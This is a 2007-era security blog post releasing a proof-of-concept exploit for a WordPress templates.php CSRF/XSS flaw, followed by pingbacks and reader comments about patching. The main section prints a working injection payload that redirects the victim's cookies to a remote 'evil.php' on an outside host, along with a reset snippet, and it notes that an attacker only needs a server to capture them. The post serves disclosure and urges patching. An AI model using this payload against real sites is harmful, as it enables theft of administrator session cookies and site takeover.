Wordpress template.php Exploit
Update: 16/01 see http://michaeldaw.org/projects/wpsec/
Its been a few days since the release of:
http://michaeldaw.org/md-hacks/wordpress-persistent-xss/.
Other references:
Time to release a proof of concept exploit for this. I am sure the crackers will already be exploiting this in the wild.
If you remember from my original advisory, our attack was limited due to our attack being passed through PHP’s basename function. To get around this we borrow the characters from document.location. I wanted an exploit that was simple and compact.
I created two HTML files to aid in my research, Injection.html and Recover.html.
First: Inject.html
This is our actual exploit (we use a nested IMG exploit):
<
img src='https://wordpress-site/wp/wp-admin/templates.php?file=<
img src=%27%27 onerror="javascript:
var s=(document.location.toString().charAt(6));
var url=(%27http:%27%2Bs%2Bs%2B%27michaeldaw.org%27);
document.location=url%2Bs%2B%27evil.php?%27%2Bdocument.cookie">'
>
Second: Recover.php
If we mess up we may create an annoying, persistent redirect that prevents us access to the templates.php file. So this next HTML file simply resets our templates.php file using the same injection point.
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=a"> <img src="https://wordpress-site/wp/wp-admin/templates.php?file=b"> <img src="https://wordpress-site/wp/wp-admin/templates.php?file=c"> <img src="https://wordpress-site/wp/wp-admin/templates.php?file=d"> <img src="https://wordpress-site/wp/wp-admin/templates.php?file=e"> <img src="https://wordpress-site/wp/wp-admin/templates.php?file=f">
Job done; all that is required is for an attacker to setup a file on a remote server to capture the cookies.
Conclusion
I hope this article “strongly” encourages WordPress users to apply the latest patch ASAP! Another attack vector I was thinking of was injecting PHP code straight into the WordPress Installation. I can see really bad worm potential with this vulnerability. I stress again, apply the patch.
[…] Wie es aussieht gibt es seit drei Tagen eine sogenannte Wordpress Template.PHP HTML Injection Vulnerability die es dem Angreifer erlaubt Code auf der Seite auszuführen. Wer sich für den proof of concept exploit ansehen möchte geht bitte auf die Seite von Michael Daw und tut dieses dort. […]
[…] http://michaeldaw.org/md-hacks/wordpress-templatephp-exploit/ […]
[…] As as a note, if you want to see a proof of concept regarding this wordpress issue, you can go to David Kierznowski homepage and see it by yourself […]
Cross Site Scripting (XSS) en Wordpress…
Nota: Este post ha sido escrito luego de reportar los fallos al equipo de desarrollo de Wordpress.
El dÃa de ayer acabo de reportar dos fallos de seguridad en Wordpress que permiten realizar XSS a sitios que utilizen Wordpress como plataforma…
I have updated the patch….but how do i know it works fine.I mean is there a test that can be done?
Moreover , the changes done are they tested for intigrity test ie it works properly with wordpress as a whole…
I was not sure if its the right place to ask, bu ti think you are the right person for that
Thx and Regards
Ashish
Ashish: I’m not the right person to ask; however, the patch (http://trac.wordpress.org/changeset/4665) should not break anything but obviously be cautious and make sure you have done backups before you try anything.
At a minimum I would atleast make a copy of the original templates.php file in case you notice it stuffing something up later. Yes it can be tested. This post discusses the exploit. You can email me if you require additional information.
DK
[…] [Source] […]
Thx David,
I have applied the patch and will see how it goes.Had mae a backup too.
Thx for the discovery.I will be a regular reader of your blog now.
Ashish, your welcome.
[…] Download templates.php Unified Diff | Zip Archive Via michaeldaw.org [Thanks Ashish] if (typeof window.Delicious == “undefined”) window.Delicious = {}; Delicious.BLOGBADGE_DEFAULT_CLASS = ‘delicious-blogbadge-line’; Tags […]
[…] [Source] Share and Enjoy:These icons link to social bookmarking sites where readers can share and discover new web pages. […]
[…] Read more about this exploit on Operation N or Security Focus […]
[…] To learn more about this vulnerability, visit Operation N or Security Focus. Report via Tech-Buzz. […]
Hi,
Just wanted to ask, Can you add the link of the official announcement of wordpress regarding this matter in this post.I was unable to find it.
[…] Posted by adam k on January 2nd, 2007 David Kierznowski has uncovered an exploit in the popular Wordpress blogging software that everyone should be aware of. Popular security website Security Focus has the issue documented, and it is suggested that you upgrade your template.php file as soon as possible to avoid becoming a victim. The Wordpress team has issued an updated release, version 2.0.6 that contains a fix. Simply put, to fix the wordpress exploit, visit the wordpress site and edit line 114 in your template.php file. […]
Ashish, I don’t think there was an official announcement. A fix was provided as listed above. Nothing more was said as far as I know.
This “type” of vulnerability (CSRF) has only recently been gaining popularity. I don’t think many people understand its dangers.
You Are right.I had been asking all the bloggers about this, but hardly anybody know.Most probably it was the time of holiday and nobody looked back.
Hey guys,
I appreciate all the work that has been put into correcting this problem. Thilak at TechBuzz wrote a post that references this article here. I am curious though why Wordpress.org hasn’t published anything regarding this? I checked their official blog and nothing has been posted. Do you think that they know about this problem? If they do, then are they planning to release their own patch? Either case, I will download and get my site fixed. Thanks a lot…
- Garry
[…] If your blog using Wordpress version 2.0.5 and below that mean you are expose to hacker attack by using Cross-site scripting vulnerability that has been found. What hacker need to do is just inject some script or HTML code into your Wordpress wp-admin/template.php file. To learn more how can hacker do that you can read from Operation N and Security Focus. […]
Security Alert: templates.php XSS vulnerability in WordPress…
Thanks to Thilak of TechBuzz, I’ve just learned about wp-admin/templates.php (part of your WordPress administration functionality) seems to be vulnerable to a rather nasty XSS exploit.
……
Garry, WordPress has been informed (hence the patch for v2.0.5). They have also let me know that it will be corrected in WordPress 2.0.6. I do not know why they did not publish an advisory (see my previous comments for possible reasons).
[…] wordpress-templatephp-exploit […]
[…] You can read more about this exploit on Security Focus and Operation n. […]
[…] מספר ×‘×œ×•×’×™× ×“×™×•×•×—×• ×”×™×•× ×¢×œ פירצת ×בטחה מסוג (XSS (Cross-Site Scripting התגלתה בקובץ templates.php ×©× ×ž×¦× ×‘×ª×•×š התיקייה wp-admin. […]
[…] You can get more details and updates of this threat from Operation n and Technospot.net […]
[…] http://michaeldaw.org/md-hacks/wordpress-templatephp-exploit/ […]
[…] Via de FeedReader kwamen er verschillende berichten binnen dat er een belangrijke upgrade is voor WordPress. Het kan niet anders dat deze upgrade werkelijk belangrijk is want de volgende vernieuwde versie WordPress 2.1 staat in de startblokken. Er wordt geadviseerd dat iedereen de upgrade naar WordPress 2.06 zo spoedig mogelijk uitvoert. Naar verwachting lost deze uitvoering het recent gemelde Wordpress template.php misbruik op. Dit is de eerste keer dat ik van deze lek hoorde… […]
[…] Il y a quelques jours une faille de sécurité avait été décellée dans l’un des fichiers de wordpress (le template.php pour être précis). A priori le problème était grave dixit les experts qui avaient proposé ilicot un patch pour le fichier à problème! […]
[…] Filed under: Blogs, Bloggers & Blogging , Software , WordPress WordPress 2.0.6 —”a security release version with an important security fix has been released. It’s a recommended version that everyone should upgrade to, and it probably may also’v addresed the exploit discovered in WordPress Template.php. […]
[…] An important upgrade of Wordpress 2.0.6 is released it includes an important security fix and they recommended everyone upgrades their Wordpress installations. I guess this release fixes the recently reported Wordpress template.php Exploit, which had WordPress users confused about applying patches. Some of the important features in the release are […]
[…] Il y a quelques jours une faille de sécurité avait été décelée dans l’un des fichiers de wordpress (le template.php pour être précis). A priori le problème était grave dixit les experts qui avaient proposé ilico un patch pour le fichier à problème! […]
Personally, I never use more than a single link in the comment I post because doing so can trigger spam catchers if the user has that plugin activated, whereas a single link will not.
[…] this release fixes the recently reported Wordpress template.php Exploit, which had WordPress users confused about applying patches. Thanks to Ashish Mohta for this […]
I’m using ver 2.0.5 and patched the template.php but after patching I can’t edit my files via web.
any suggestion ?
Alireza, thats quite an old version, I can think you may have more security problems than just the template php vulnerability. I would recommend you make a backup and then upgrade to the latest version.
Good site! Good resources here, I will bookmark!
Thanks, bye!
Very good information. Thank you and keep up the good work.
[…] Template CSRF Vulnerability (more) […]
[…] this release fixes the recently reported Wordpress template.php Exploit, which had WordPress users confused about applying patches. Thanks to Ashish Mohta for this […]
thanks for the usefull content. Keep on writing so good stuff!